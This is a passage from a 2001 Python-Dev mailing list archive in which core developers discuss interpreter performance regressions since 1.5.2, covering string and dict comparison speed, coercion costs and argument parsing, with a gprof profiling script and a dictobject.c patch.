Jim From tim.one at home.com Fri May 18 21:26:02 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use".
pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! From tim.one at home.com Fri May 18 21:48:33 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so usually gets out before incrementing. > It's not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, an association > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present.
The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy at alum.mit.edu Fri May 18 23:07:37 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctionCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and what their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata.
If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This test spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido at digicool.com Fri May 18 23:58:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctionCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and what their types are.
I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module. But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). 
Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This test spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC. I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Sat May 19 00:06:05 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):

    LDFLAGS="-pg" OPT="-pg" configure
    make

When you run python it produces a gmon.out file. To run gprof, pass it the profile-enabled executable and gmon.out. It'll spit out the results on stdout.

2.
Use this handy script (below) to run a single pybench test under the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile('^([^:]+):(.*)')
rx_decl = re.compile('class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name
    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)
    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)
    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])

From jim at interet.com Sat May 19 18:45:15 2001 From: jim at interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Sommerville, NJ) Borders book store last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great.
The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido at digicool.com Sun May 20 01:18:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sun May 20 11:31:25 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
>     c = (*f)(v, w);
>     if (PyErr_Occurred())

Note that the usual way to write this is

    if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error").

>         return NULL;
>     return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up!
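For readers following the call-count argument, the conversion Martin describes (a three-way result c in {-1, 0, 1} combined with a rich-comparison operator, yielding true or false) can be modeled in a few lines of Python. This is an illustrative sketch, not the C code in object.c: the op names stand in for the Py_LT ... Py_GE constants, and three_way() is a hypothetical helper playing the role of the old cmp():

```python
import operator

# Each rich-comparison op maps to the test applied to the three-way result c.
# The keys mirror the C constants Py_LT ... Py_GE; the table itself is a sketch.
_OPS = {
    "LT": operator.lt,
    "LE": operator.le,
    "EQ": operator.eq,
    "NE": operator.ne,
    "GT": operator.gt,
    "GE": operator.ge,
}


def three_way(a, b):
    """Hypothetical stand-in for cmp(): returns -1, 0 or 1."""
    return (a > b) - (a < b)


def convert_3way(op, c):
    """Turn a three-way result c (<0, 0, >0) into True/False for op."""
    return _OPS[op](c, 0)


if __name__ == "__main__":
    c = three_way("ab", "cd")
    print(c, convert_3way("LT", c), convert_3way("EQ", c))
```

In C each of these steps is a separate call unless the compiler inlines it, which is consistent with Martin's observation that inlining convert_3way_to_object closed the gap.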
> I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agreed Py_EQ is most frequent. > With a control flow like > > if (a->ob_size != b->ob_size) > goto False; > > if (a->ob_size == 0) > goto True; > > if (a->ob_sval[0] != b->ob_sval[0]) > goto False; > > if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) > goto False; > else > goto True; > > we can reduce the number of function calls Suggest collapsing the third into the first: if (a->ob_size != b->ob_size || a->ob_sval[0] != b->ob_sval[0]) goto False; There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions ), and better to test for the more common case first. From tim.one at home.com Sun May 20 11:54:08 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ... 
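The Py_EQ control flow Martin proposes for strings, with Tim's suggestion of folding the first-byte test into the length test, can be sketched in Python as below. This is a model under stated assumptions, not CPython code: `bytes` objects stand in for string objects, `string_eq_fast_path` is a hypothetical name, and `a == b` stands in for the final memcmp().

```python
def string_eq_fast_path(a: bytes, b: bytes) -> bool:
    """Equality test ordered like the proposed C fast path for Py_EQ."""
    # 1. Different lengths, or (Tim's reordering) different first bytes:
    #    not equal, decided without scanning.  C can read ob_sval[0] even for
    #    empty strings because of the trailing NUL; Python bytes have no such
    #    sentinel, so the index is guarded by a length check here.
    if len(a) != len(b) or (len(a) > 0 and a[0] != b[0]):
        return False
    # 2. Same length and that length is zero: both are empty, hence equal.
    if len(a) == 0:
        return True
    # 3. Full comparison of the bytes (memcmp() in the C version).
    return a == b
```

Testing the common "first byte differs" case in the same branch as the length test means most unequal pairs are rejected after one or two cheap comparisons, which is the ordering Tim argues for.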
> Whether there's a fruitless branch depends on your compiler. A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now. 
But then, your > programs are different, of course... There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision > It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one at home.com Sun May 20 12:13:14 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to tbe rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one at home.com Sun May 20 13:05:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0. 
IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal at lemburg.com Sun May 20 13:50:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 
2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. truning the VM a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Sun May 20 13:52:40 2001 From: mwh at python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string. 
> This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! 
S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one at home.com Sun May 20 14:57:11 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. 
truning the VM a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one at home.com Sun May 20 14:58:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline . From tim.one at home.com Sun May 20 15:09:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. Special-casing the snot out of "O" looks like a winner : count format %total cumulative% ------- -------- ------ ----------- 1440897 'O' 47.45 47.45 327694 'O!' 
10.79 58.24 285570 'O|i' 9.40 67.65 262168 'O!|O' 8.63 76.28 227405 'l' 7.49 83.77 146537 's#' 4.83 88.60 76779 'OO|O' 2.53 91.12 65682 '|ss' 2.16 93.29 48033 'OO' 1.58 94.87 39879 'O|O&O&' 1.31 96.18 Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations. fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz at rahul.net Sun May 20 15:50:08 2001 From: aahz at rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to tbe rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. 
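A table like Tim's PyArg_ParseTuple() format summary earlier in this thread (count, %total, cumulative%) can be produced from a log of format strings. The sketch below assumes such a log already exists as a list of strings; collecting it (for example by instrumenting the interpreter) is not shown, the function names are hypothetical, and the sample data is made up for illustration. Stripping "decorations" here means dropping everything from the first ':' (function name) or ';' (error message) onward.

```python
from collections import Counter

def strip_decorations(fmt):
    """Drop a ':funcname' or ';message' suffix from a format string."""
    for i, ch in enumerate(fmt):
        if ch in ":;":
            return fmt[:i]
    return fmt

def tally_formats(formats, top=10):
    """Return (count, format, percent, cumulative percent) rows, most common first."""
    counts = Counter(strip_decorations(f) for f in formats)
    total = sum(counts.values())
    rows = []
    running = 0.0
    for fmt, n in counts.most_common(top):
        pct = 100.0 * n / total
        running += pct
        rows.append((n, fmt, pct, running))
    return rows

if __name__ == "__main__":
    # Hypothetical sample log; not real measurements.
    sample = ["O:f", "O:g", "O!|O:h", "l;bad value", "O"]
    for n, fmt, pct, cum in tally_formats(sample):
        print("%7d %-8s %6.2f %6.2f" % (n, repr(fmt), pct, cum))
```

Because the cumulative column is a running sum over the sorted rows, it shows directly how much of the traffic a fast path for the first few formats (such as "O") would cover.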
From martin at loewis.home.cs.tu-berlin.de Sun May 20 15:48:43 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test

6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920

With identity test, I got

6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920

That still does not look like a significant difference to me. Regards, Martin From guido at digicool.com Sun May 20 15:56:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to the rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp. But if
But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right? There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3r party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sun May 20 18:19:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced. 
